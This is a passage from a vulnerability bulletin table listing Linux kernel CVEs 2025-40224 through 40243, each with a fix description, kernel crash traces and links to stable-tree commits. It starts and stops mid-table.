https://git.kernel.org/stable/c/f93a84ffb884d761a9d4e869ba29c238711e81f1 https://git.kernel.org/stable/c/3a3b8e89c7201c5b3b76ac4a4069d1adde1477d6 https://git.kernel.org/stable/c/4b1270902609ef0d935ed2faa2ea6d122bd148f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (cgbc-hwmon) Add missing NULL check after devm_kzalloc() The driver allocates memory for sensor data using devm_kzalloc(), but did not check if the allocation succeeded. In case of memory allocation failure, dereferencing the NULL pointer would lead to a kernel crash. Add a NULL pointer check and return -ENOMEM to handle allocation failure properly. | 2025-12-04 | not yet calculated | CVE-2025-40224 | https://git.kernel.org/stable/c/240b82b86a091c1aa49d951d4467425420a081a0 https://git.kernel.org/stable/c/a09a5aa8bf258ddc99a22c30f17fe304b96b5350 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix kernel panic on partial unmap of a GPU VA region This commit address a kernel panic issue that can happen if Userspace tries to partially unmap a GPU virtual region (aka drm_gpuva). The VM_BIND interface allows partial unmapping of a BO. Panthor driver pre-allocates memory for the new drm_gpuva structures that would be needed for the map/unmap operation, done using drm_gpuvm layer. It expected that only one new drm_gpuva would be needed on umap but a partial unmap can require 2 new drm_gpuva and that's why it ended up doing a NULL pointer dereference causing a kernel panic. Following dump was seen when partial unmap was exercised. Unable to handle kernel NULL pointer dereference at virtual address 0000000000000078 Mem abort info: ESR = 0x0000000096000046 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x06: level 2 translation fault Data abort info: ISV = 0, ISS = 0x00000046, ISS2 = 0x00000000 CM = 0, WnR = 1, TnD = 0, TagAccess = 0 GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 user pgtable: 4k pages, 48-bit VAs, pgdp=000000088a863000 [000000000000078] pgd=080000088a842003, p4d=080000088a842003, pud=0800000884bf5003, pmd=0000000000000000 Internal error: Oops: 0000000096000046 [#1] PREEMPT SMP <snip> pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : panthor_gpuva_sm_step_remap+0xe4/0x330 [panthor] lr : panthor_gpuva_sm_step_remap+0x6c/0x330 [panthor] sp : ffff800085d43970 x29: ffff800085d43970 x28: ffff00080363e440 x27: ffff0008090c6000 x26: 0000000000000030 x25: ffff800085d439f8 x24: ffff00080d402000 x23: ffff800085d43b60 x22: ffff800085d439e0 x21: ffff00080abdb180 x20: 0000000000000000 x19: 0000000000000000 x18: 0000000000000010 x17: 6e656c202c303030 x16: 3666666666646466 x15: 393d61766f69202c x14: 312d3d7361203a70 x13: 303030323d6e656c x12: ffff80008324bf58 x11: 0000000000000003 x10: 0000000000000002 x9 : ffff8000801a6a9c x8 : ffff00080360b300 x7 : 0000000000000000 x6 : 000000088aa35fc7 x5 : fff1000080000000 x4 : ffff8000842ddd30 x3 : 0000000000000001 x2 : 0000000100000000 x1 : 0000000000000001 x0 : 0000000000000078 Call trace: panthor_gpuva_sm_step_remap+0xe4/0x330 [panthor] op_remap_cb.isra.22+0x50/0x80 __drm_gpuvm_sm_unmap+0x10c/0x1c8 drm_gpuvm_sm_unmap+0x40/0x60 panthor_vm_exec_op+0xb4/0x3d0 [panthor] panthor_vm_bind_exec_sync_op+0x154/0x278 [panthor] panthor_ioctl_vm_bind+0x160/0x4a0 [panthor] drm_ioctl_kernel+0xbc/0x138 drm_ioctl+0x240/0x500 __arm64_sys_ioctl+0xb0/0xf8 invoke_syscall+0x4c/0x110 el0_svc_common.constprop.1+0x98/0xf8 do_el0_svc+0x24/0x38 el0_svc+0x40/0xf8 el0t_64_sync_handler+0xa0/0xc8 el0t_64_sync+0x174/0x178 | 2025-12-04 | not yet calculated | CVE-2025-40225 | https://git.kernel.org/stable/c/efe6dced3512066ebee2cf7c4c38d1c99625814e https://git.kernel.org/stable/c/e9c19d19dd7e08db89cead5b0337c18590dc6645 https://git.kernel.org/stable/c/4eabd0d8791eaf9a7b114ccbf56eb488aefe7b1f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: arm_scmi: Account for failed debug initialization When the SCMI debug subsystem fails to initialize, the related debug root will be missing, and the underlying descriptor will be NULL. Handle this fault condition in the SCMI debug helpers that maintain metrics counters. | 2025-12-04 | not yet calculated | CVE-2025-40226 | https://git.kernel.org/stable/c/d719ce9f286c439795cd2beee4c91f12b84bc5a0 https://git.kernel.org/stable/c/e088efcd97cb7c7297d166bb52c3b87a29f6a0b1 https://git.kernel.org/stable/c/554c9d5c6c695aedaecfb4365c187102709397b0 https://git.kernel.org/stable/c/2290ab43b9d8eafb8046387f10a8dfa2b030ba46 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs: dealloc commit test ctx always The damon_ctx for testing online DAMON parameters commit inputs is deallocated only when the test fails. This means memory is leaked for every successful online DAMON parameters commit. Fix the leak by always deallocating it. | 2025-12-04 | not yet calculated | CVE-2025-40227 | https://git.kernel.org/stable/c/ba236520ae53418859f4b7c7de3c71478d3c0b5a https://git.kernel.org/stable/c/139e7a572af0b45f558b5e502121a768dc328ba8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/sysfs: catch commit test ctx alloc failure Patch series "mm/damon/sysfs: fix commit test damon_ctx [de]allocation". DAMON sysfs interface dynamically allocates and uses a damon_ctx object for testing if given inputs for online DAMON parameters update is valid. The object is being used without an allocation failure check, and leaked when the test succeeds. Fix the two bugs. This patch (of 2): The damon_ctx for testing online DAMON parameters commit inputs is used without its allocation failure check. This could result in an invalid memory access. Fix it by directly returning an error when the allocation failed. | 2025-12-04 | not yet calculated | CVE-2025-40228 | https://git.kernel.org/stable/c/5b3609d9b9650bdea0bfdf643e0ce57e1aed67fc https://git.kernel.org/stable/c/f0c5118ebb0eb7e4fd6f0d2ace3315ca141b317f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: fix potential memory leak by cleaning ops_filter in damon_destroy_scheme Currently, damon_destroy_scheme() only cleans up the filter list but leaves ops_filter untouched, which could lead to memory leaks when a scheme is destroyed. This patch ensures both filter and ops_filter are properly freed in damon_destroy_scheme(), preventing potential memory leaks. | 2025-12-04 | not yet calculated | CVE-2025-40229 | https://git.kernel.org/stable/c/ff8dcf621a4172f4a6d42cbbb25d21659d3ac300 https://git.kernel.org/stable/c/7071537159be845a5c4ed5fb7d3db25aa4bd04a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm: prevent poison consumption when splitting THP When performing memory error injection on a THP (Transparent Huge Page) mapped to userspace on an x86 server, the kernel panics with the following trace. The expected behavior is to terminate the affected process instead of panicking the kernel, as the x86 Machine Check code can recover from an in-userspace #MC. mce: [Hardware Error]: CPU 0: Machine Check Exception: f Bank 3: bd80000000070134 mce: [Hardware Error]: RIP 10:<ffffffff8372f8bc> {memchr_inv+0x4c/0xf0} mce: [Hardware Error]: TSC afff7bbff88a ADDR 1d301b000 MISC 80 PPIN 1e741e77539027db mce: [Hardware Error]: PROCESSOR 0:d06d0 TIME 1758093249 SOCKET 0 APIC 0 microcode 80000320 mce: [Hardware Error]: Run the above through 'mcelog --ascii' mce: [Hardware Error]: Machine check: Data load in unrecoverable area of kernel Kernel panic - not syncing: Fatal local machine check The root cause of this panic is that handling a memory failure triggered by an in-userspace #MC necessitates splitting the THP. The splitting process employs a mechanism, implemented in try_to_map_unused_to_zeropage(), which reads the pages in the THP to identify zero-filled pages. However, reading the pages in the THP results in a second in-kernel #MC, occurring before the initial memory_failure() completes, ultimately leading to a kernel panic. See the kernel panic call trace on the two #MCs. First Machine Check occurs // [1] memory_failure() // [2] try_to_split_thp_page() split_huge_page() split_huge_page_to_list_to_order() __folio_split() // [3] remap_page() remove_migration_ptes() remove_migration_pte() try_to_map_unused_to_zeropage() // [4] memchr_inv() // [5] Second Machine Check occurs // [6] Kernel panic [1] Triggered by accessing a hardware-poisoned THP in userspace, which is typically recoverable by terminating the affected process. [2] Call folio_set_has_hwpoisoned() before try_to_split_thp_page(). [3] Pass the RMP_USE_SHARED_ZEROPAGE remap flag to remap_page(). [4] Try to map the unused THP to zeropage. [5] Re-access pages in the hw-poisoned THP in the kernel. [6] Triggered in-kernel, leading to a panic kernel. In Step[2], memory_failure() sets the poisoned flag on the page in the THP by TestSetPageHWPoison() before calling try_to_split_thp_page(). As suggested by David Hildenbrand, fix this panic by not accessing to the poisoned page in the THP during zeropage identification, while continuing to scan unaffected pages in the THP for possible zeropage mapping. This prevents a second in-kernel #MC that would cause kernel panic in Step[4]. Thanks to Andrew Zaborowski for his initial work on fixing this issue. | 2025-12-04 | not yet calculated | CVE-2025-40230 | https://git.kernel.org/stable/c/6fc0a7c99e973a50018c8b4be34914a1b5c7b383 https://git.kernel.org/stable/c/92acf4b04f255d2f0f6770bb0d0a208d8ffb2b77 https://git.kernel.org/stable/c/841a8bfcbad94bb1ba60f59ce34f75259074ae0d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock: fix lock inversion in vsock_assign_transport() Syzbot reported a potential lock inversion deadlock between vsock_register_mutex and sk_lock-AF_VSOCK when vsock_linger() is called. The issue was introduced by commit 687aa0c5581b ("vsock: Fix transport_* TOCTOU") which added vsock_register_mutex locking in vsock_assign_transport() around the transport->release() call, that can call vsock_linger(). vsock_assign_transport() can be called with sk_lock held. vsock_linger() calls sk_wait_event() that temporarily releases and re-acquires sk_lock. During this window, if another thread hold vsock_register_mutex while trying to acquire sk_lock, a circular dependency is created. Fix this by releasing vsock_register_mutex before calling transport->release() and vsock_deassign_transport(). This is safe because we don't need to hold vsock_register_mutex while releasing the old transport, and we ensure the new transport won't disappear by obtaining a module reference first via try_module_get(). | 2025-12-04 | not yet calculated | CVE-2025-40231 | https://git.kernel.org/stable/c/ce4f856c64f0bc30e29302a0ce41f4295ca391c5 https://git.kernel.org/stable/c/09bba278ccde25a14b6e5088a9e65a8717d0cccf https://git.kernel.org/stable/c/b44182c116778feaa05da52a426aeb9da1878dcf https://git.kernel.org/stable/c/42ed0784d11adebf748711e503af0eb9f1e6d81d https://git.kernel.org/stable/c/251caee792a21eb0b781aab91362b422c945e162 https://git.kernel.org/stable/c/a2a4346eea8b4cb75037dbcb20b98cb454324f80 https://git.kernel.org/stable/c/f7c877e7535260cc7a21484c994e8ce7e8cb6780 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rv: Fully convert enabled_monitors to use list_head as iterator The callbacks in enabled_monitors_seq_ops are inconsistent. Some treat the iterator as struct rv_monitor *, while others treat the iterator as struct list_head *. This causes a wrong type cast and crashes the system as reported by Nathan. Convert everything to use struct list_head * as iterator. This also makes enabled_monitors consistent with available_monitors. | 2025-12-04 | not yet calculated | CVE-2025-40232 | https://git.kernel.org/stable/c/8948a0338d33c4a7ef1e0c439a3ad1d5fe9355ae https://git.kernel.org/stable/c/103541e6a5854b08a25e4caa61e990af1009a52e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: clear extent cache after moving/defragmenting extents The extent map cache can become stale when extents are moved or defragmented, causing subsequent operations to see outdated extent flags. This triggers a BUG_ON in ocfs2_refcount_cal_cow_clusters(). The problem occurs when: 1. copy_file_range() creates a reflinked extent with OCFS2_EXT_REFCOUNTED 2. ioctl(FITRIM) triggers ocfs2_move_extents() 3. __ocfs2_move_extents_range() reads and caches the extent (flags=0x2) 4. ocfs2_move_extent()/ocfs2_defrag_extent() calls __ocfs2_move_extent() which clears OCFS2_EXT_REFCOUNTED flag on disk (flags=0x0) 5. The extent map cache is not invalidated after the move 6. Later write() operations read stale cached flags (0x2) but disk has updated flags (0x0), causing a mismatch 7. BUG_ON(!(rec->e_flags & OCFS2_EXT_REFCOUNTED)) triggers Fix by clearing the extent map cache after each extent move/defrag operation in __ocfs2_move_extents_range(). This ensures subsequent operations read fresh extent data from disk. | 2025-12-04 | not yet calculated | CVE-2025-40233 | https://git.kernel.org/stable/c/93166bc53c0e3587058327a4121daea34b4fecd5 https://git.kernel.org/stable/c/a7ee72286efba1d407c6f15a0528e43593fb7007 https://git.kernel.org/stable/c/93b1ab422f1966b71561158e1aedce4ec100f357 https://git.kernel.org/stable/c/e92af7737a94a729225d2a5d180eaaa77fe0bbc1 https://git.kernel.org/stable/c/aa6a21409dd6221bb268b56bb410e031c632ff9a https://git.kernel.org/stable/c/bb69928ed578f881e68d26aaf1a8f6e7faab3b44 https://git.kernel.org/stable/c/a21750df2f6169af6e039a3bb4893d6c9564e48d https://git.kernel.org/stable/c/78a63493f8e352296dbc7cb7b3f4973105e8679e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86: alienware-wmi-wmax: Fix NULL pointer dereference in sleep handlers Devices without the AWCC interface don't initialize `awcc`. Add a check before dereferencing it in sleep handlers. | 2025-12-04 | not yet calculated | CVE-2025-40234 | https://git.kernel.org/stable/c/24c3812c9e817d19e4842d7495561594de1ddcb4 https://git.kernel.org/stable/c/a49c4d48c3b60926e6a8cec217bf95aa65388ecc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: directly free partially initialized fs_info in btrfs_check_leaked_roots() If fs_info->super_copy or fs_info->super_for_commit allocated failed in btrfs_get_tree_subvol(), then no need to call btrfs_free_fs_info(). Otherwise btrfs_check_leaked_roots() would access NULL pointer because fs_info->allocated_roots had not been initialised. syzkaller reported the following information: ------------[ cut here ]------------ BUG: unable to handle page fault for address: fffffffffffffbb0 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 64c9067 P4D 64c9067 PUD 64cb067 PMD 0 Oops: Oops: 0000 [#1] SMP KASAN PTI CPU: 0 UID: 0 PID: 1402 Comm: syz.1.35 Not tainted 6.15.8 #4 PREEMPT(lazy) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), (...) RIP: 0010:arch_atomic_read arch/x86/include/asm/atomic.h:23 [inline] RIP: 0010:raw_atomic_read include/linux/atomic/atomic-arch-fallback.h:457 [inline] RIP: 0010:atomic_read include/linux/atomic/atomic-instrumented.h:33 [inline] RIP: 0010:refcount_read include/linux/refcount.h:170 [inline] RIP: 0010:btrfs_check_leaked_roots+0x18f/0x2c0 fs/btrfs/disk-io.c:1230 [...] Call Trace: <TASK> btrfs_free_fs_info+0x310/0x410 fs/btrfs/disk-io.c:1280 btrfs_get_tree_subvol+0x592/0x6b0 fs/btrfs/super.c:2029 btrfs_get_tree+0x63/0x80 fs/btrfs/super.c:2097 vfs_get_tree+0x98/0x320 fs/super.c:1759 do_new_mount+0x357/0x660 fs/namespace.c:3899 path_mount+0x716/0x19c0 fs/namespace.c:4226 do_mount fs/namespace.c:4239 [inline] __do_sys_mount fs/namespace.c:4450 [inline] __se_sys_mount fs/namespace.c:4427 [inline] __x64_sys_mount+0x28c/0x310 fs/namespace.c:4427 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x92/0x180 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7f032eaffa8d [...] | 2025-12-04 | not yet calculated | CVE-2025-40235 | https://git.kernel.org/stable/c/b1c2b4e6ffd307720ab6ce42f6749b0c02ba0a73 https://git.kernel.org/stable/c/0c2b2d4d053e9840e6da6ed581befa20309f281a https://git.kernel.org/stable/c/17679ac6df6c4830ba711835aa8cf961be36cfa1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-net: zero unused hash fields When GSO tunnel is negotiated virtio_net_hdr_tnl_from_skb() tries to initialize the tunnel metadata but forget to zero unused rxhash fields. This may leak information to another side. Fixing this by zeroing the unused hash fields. | 2025-12-04 | not yet calculated | CVE-2025-40236 | https://git.kernel.org/stable/c/b625d231c66a6041e98817ffc944bf6e4c45b2e3 https://git.kernel.org/stable/c/b2284768c6b32aa224ca7d0ef0741beb434f03aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/notify: call exportfs_encode_fid with s_umount Calling intotify_show_fdinfo() on fd watching an overlayfs inode, while the overlayfs is being unmounted, can lead to dereferencing NULL ptr. This issue was found by syzkaller. Race Condition Diagram: Thread 1 Thread 2 -------- -------- generic_shutdown_super() shrink_dcache_for_umount sb->s_root = NULL | | vfs_read() | inotify_fdinfo() | * inode get from mark * | show_mark_fhandle(m, inode) | exportfs_encode_fid(inode, ..) | ovl_encode_fh(inode, ..) | ovl_check_encode_origin(inode) | * deref i_sb->s_root * | | v fsnotify_sb_delete(sb) Which then leads to: [ 32.133461] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000006: 0000 [#1] SMP DEBUG_PAGEALLOC KASAN NOPTI [ 32.134438] KASAN: null-ptr-deref in range [0x0000000000000030-0x0000000000000037] [ 32.135032] CPU: 1 UID: 0 PID: 4468 Comm: systemd-coredum Not tainted 6.17.0-rc6 #22 PREEMPT(none) <snip registers, unreliable trace> [ 32.143353] Call Trace: [ 32.143732] ovl_encode_fh+0xd5/0x170 [ 32.144031] exportfs_encode_inode_fh+0x12f/0x300 [ 32.144425] show_mark_fhandle+0xbe/0x1f0 [ 32.145805] inotify_fdinfo+0x226/0x2d0 [ 32.146442] inotify_show_fdinfo+0x1c5/0x350 [ 32.147168] seq_show+0x530/0x6f0 [ 32.147449] seq_read_iter+0x503/0x12a0 [ 32.148419] seq_read+0x31f/0x410 [ 32.150714] vfs_read+0x1f0/0x9e0 [ 32.152297] ksys_read+0x125/0x240 IOW ovl_check_encode_origin derefs inode->i_sb->s_root, after it was set to NULL in the unmount path. Fix it by protecting calling exportfs_encode_fid() from show_mark_fhandle() with s_umount lock. This form of fix was suggested by Amir in [1]. [1]: https://lore.kernel.org/all/CAOQ4uxhbDwhb+2Brs1UdkoF0a3NSdBAOQPNfEHjahrgoKJpLEw@mail.gmail.com/ | 2025-12-04 | not yet calculated | CVE-2025-40237 | https://git.kernel.org/stable/c/bc1c6b803e14ea2b8f7e33b7164013f666ceb656 https://git.kernel.org/stable/c/3f307a9f7a7a2822e38ac451b73e2244e7279496 https://git.kernel.org/stable/c/d1894bc542becb0fda61e7e513b09523cab44030 https://git.kernel.org/stable/c/a7c4bb43bfdc2b9f06ee9d036028ed13a83df42a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix IPsec cleanup over MPV device When we do mlx5e_detach_netdev() we eventually disable blocking events notifier, among those events are IPsec MPV events from IB to core. So before disabling those blocking events, make sure to also unregister the devcom device and mark all this device operations as complete, in order to prevent the other device from using invalid netdev during future devcom events which could cause the trace below. BUG: kernel NULL pointer dereference, address: 0000000000000010 PGD 146427067 P4D 146427067 PUD 146488067 PMD 0 Oops: Oops: 0000 [#1] SMP CPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1 Tainted: [W]=WARN Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core] Code: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 <48> 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40 RSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206 RAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00 RDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000 RBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000 R10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600 R13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80 FS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? __die+0x20/0x60 ? page_fault_oops+0x150/0x3e0 ? exc_page_fault+0x74/0x130 ? asm_exc_page_fault+0x22/0x30 ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core] mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core] mlx5_devcom_send_event+0x8c/0x170 [mlx5_core] blocking_event+0x17b/0x230 [mlx5_core] notifier_call_chain+0x35/0xa0 blocking_notifier_call_chain+0x3d/0x60 mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core] mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core] mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib] mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib] ? idr_alloc_cyclic+0x50/0xb0 ? __kmalloc_cache_noprof+0x167/0x340 ? __kmalloc_noprof+0x1a7/0x430 __mlx5_ib_add+0x34/0xd0 [mlx5_ib] mlx5r_probe+0xe9/0x310 [mlx5_ib] ? kernfs_add_one+0x107/0x150 ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib] auxiliary_bus_probe+0x3e/0x90 really_probe+0xc5/0x3a0 ? driver_probe_device+0x90/0x90 __driver_probe_device+0x80/0x160 driver_probe_device+0x1e/0x90 __device_attach_driver+0x7d/0x100 bus_for_each_drv+0x80/0xd0 __device_attach+0xbc/0x1f0 bus_probe_device+0x86/0xa0 device_add+0x62d/0x830 __auxiliary_device_add+0x3b/0xa0 ? auxiliary_device_init+0x41/0x90 add_adev+0xd1/0x150 [mlx5_core] mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core] esw_mode_change+0x6c/0xc0 [mlx5_core] mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core] devlink_nl_eswitch_set_doit+0x60/0xe0 genl_family_rcv_msg_doit+0xd0/0x120 genl_rcv_msg+0x180/0x2b0 ? devlink_get_from_attrs_lock+0x170/0x170 ? devlink_nl_eswitch_get_doit+0x290/0x290 ? devlink_nl_pre_doit_port_optional+0x50/0x50 ? genl_family_rcv_msg_dumpit+0xf0/0xf0 netlink_rcv_skb+0x54/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x1fc/0x2d0 netlink_sendmsg+0x1e4/0x410 __sock_sendmsg+0x38/0x60 ? sockfd_lookup_light+0x12/0x60 __sys_sendto+0x105/0x160 ? __sys_recvmsg+0x4e/0x90 __x64_sys_sendto+0x20/0x30 do_syscall_64+0x4c/0x100 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f27bc91b13a Code: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 <48> 3d 00 f0 ff ff ---truncated--- | 2025-12-04 | not yet calculated | CVE-2025-40238 | https://git.kernel.org/stable/c/7e212cebc863c2c7a82f480446cd731721451691 https://git.kernel.org/stable/c/8956686d398eca6d324d2d164f9d2a281175a3a1 https://git.kernel.org/stable/c/664f76be38a18c61151d0ef248c7e2f3afb4f3c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: phy: micrel: always set shared->phydev for LAN8814 Currently, during the LAN8814 PTP probe shared->phydev is only set if PTP clock gets actually set, otherwise the function will return before setting it. This is an issue as shared->phydev is unconditionally being used when IRQ is being handled, especially in lan8814_gpio_process_cap and since it was not set it will cause a NULL pointer exception and crash the kernel. So, simply always set shared->phydev to avoid the NULL pointer exception. | 2025-12-04 | not yet calculated | CVE-2025-40239 | https://git.kernel.org/stable/c/da1ef8e9eb5d4a12bec32d11636e521e7d529b9e https://git.kernel.org/stable/c/b093b06826b836c2824858669db080c190c04715 https://git.kernel.org/stable/c/399d10934740ae8cdaa4e3245f7c5f6c332da844 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sctp: avoid NULL dereference when chunk data buffer is missing chunk->skb pointer is dereferenced in the if-block where it's supposed to be NULL only. chunk->skb can only be NULL if chunk->head_skb is not. Check for frag_list instead and do it just before replacing chunk->skb. We're sure that otherwise chunk->skb is non-NULL because of outer if() condition. | 2025-12-04 | not yet calculated | CVE-2025-40240 | https://git.kernel.org/stable/c/61cda2777b07d27459f5cac5a047c3edf9c8a1a9 https://git.kernel.org/stable/c/08165c296597075763130919f2aae59b5822f016 https://git.kernel.org/stable/c/03e80a4b04ef1fb2c61dd63216ab8d3a5dcb196f https://git.kernel.org/stable/c/4f6da435fb5d8a21cbf8cae5ca5a2ba0e1012b71 https://git.kernel.org/stable/c/cb9055ba30306ede4ad920002233d0659982f1cb https://git.kernel.org/stable/c/7a832b0f99be19df608cb75c023f8027b1789bd1 https://git.kernel.org/stable/c/89b465b54227c245ddc7cc9ed822231af21123ef https://git.kernel.org/stable/c/441f0647f7673e0e64d4910ef61a5fb8f16bfb82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: fix crafted invalid cases for encoded extents Robert recently reported two corrupted images that can cause system crashes, which are related to the new encoded extents introduced in Linux 6.15: - The first one [1] has plen != 0 (e.g. plen == 0x2000000) but (plen & Z_EROFS_EXTENT_PLEN_MASK) == 0. It is used to represent special extents such as sparse extents (!EROFS_MAP_MAPPED), but previously only plen == 0 was handled; - The second one [2] has pa 0xffffffffffdcffed and plen 0xb4000, then "cur [0xfffffffffffff000] += bvec.bv_len [0x1000]" in "} while ((cur += bvec.bv_len) < end);" wraps around, causing an out-of-bound access of pcl->compressed_bvecs[] in z_erofs_submit_queue(). EROFS only supports 48-bit physical block addresses (up to 1EiB for 4k blocks), so add a sanity check to enforce this. | 2025-12-04 | not yet calculated | CVE-2025-40241 | https://git.kernel.org/stable/c/00d8fe0b72f4ca0a983abced36aad2160038c421 https://git.kernel.org/stable/c/a429b76114aaca3ef1aff4cd469dcf025431bd11 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Fix unlikely race in gdlm_put_lock In gdlm_put_lock(), there is a small window of time in which the DFL_UNMOUNT flag has been set but the lockspace hasn't been released, yet. In that window, dlm may still call gdlm_ast() and gdlm_bast(). To prevent it from dereferencing freed glock objects, only free the glock if the lockspace has actually been released. | 2025-12-04 | not yet calculated | CVE-2025-40242 | https://git.kernel.org/stable/c/279bde3bbb0ac0bad5c729dfa85983d75a5d7641 https://git.kernel.org/stable/c/64c61b4ac645222fa7b724cef616c1f862a72a40 https://git.kernel.org/stable/c/28c4d9bc0708956c1a736a9e49fee71b65deee81 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: fix KMSAN uninit-value issue in hfs_find_set_zero_bits() The syzbot reported issue in hfs_find_set_zero_bits(): ===================================================== BUG: KMSAN: uninit-value in hfs_find_set_zero_bits+0x74d/0xb60 fs/hfs/bitmap.c:45 hfs_find_set_zero_bits+0x74d/0xb60 fs/hfs/bitmap.c:45 hfs_vbm_search_free+0x13c/0x5b0 fs/hfs/bitmap.c:151 hfs_extend_file+0x6a5/0x1b00 fs/hfs/extent.c:408 hfs_get_block+0x435/0x1150 fs/hfs/extent.c:353 __block_write_begin_int+0xa76/0x3030 fs/buffer.c:2151 block_write_begin fs/buffer.c:2262 [inline] cont_write_begin+0x10e1/0x1bc0 fs/buffer.c:2601 hfs_write_begin+0x85/0x130 fs/hfs/inode.c:52 cont_expand_zero fs/buffer.c:2528 [inline] cont_write_begin+0x35a/0x1bc0 fs/buffer.c:2591 hfs_write_begin+0x85/0x130 fs/hfs/inode.c:52 hfs_file_truncate+0x1d6/0xe60 fs/hfs/extent.c:494 hfs_inode_setattr+0x964/0xaa0 fs/hfs/inode.c:654 notify_change+0x1993/0x1aa0 fs/attr.c:552 do_truncate+0x28f/0x310 fs/open.c:68 do_ftruncate+0x698/0x730 fs/open.c:195 do_sys_ftruncate fs/open.c:210 [inline] __do_sys_ftruncate fs/open.c:215 [inline] __se_sys_ftruncate fs/open.c:213 [inline] __x64_sys_ftruncate+0x11b/0x250 fs/open.c:213 x64_sys_call+0xfe3/0x3db0 arch/x86/include/generated/asm/syscalls_64.h:78 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:4154 [inline] slab_alloc_node mm/slub.c:4197 [inline] __kmalloc_cache_noprof+0x7f7/0xed0 mm/slub.c:4354 kmalloc_noprof include/linux/slab.h:905 [inline] hfs_mdb_get+0x1cc8/0x2a90 fs/hfs/mdb.c:175 hfs_fill_super+0x3d0/0xb80 fs/hfs/super.c:337 get_tree_bdev_flags+0x6e3/0x920 fs/super.c:1681 get_tree_bdev+0x38/0x50 fs/super.c:1704 hfs_get_tree+0x35/0x40 fs/hfs/super.c:388 vfs_get_tree+0xb0/0x5c0 fs/super.c:1804 do_new_mount+0x738/0x1610 fs/namespace.c:3902 path_mount+0x6db/0x1e90 fs/namespace.c:4226 do_mount fs/namespace.c:4239 [inline] __do_sys_mount fs/namespace.c:4450 [inline] __se_sys_mount+0x6eb/0x7d0 fs/namespace.c:4427 __x64_sys_mount+0xe4/0x150 fs/namespace.c:4427 x64_sys_call+0xfa7/0x3db0 arch/x86/include/generated/asm/syscalls_64.h:166 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xd9/0x210 arch/x86/entry/syscall_64.c:94 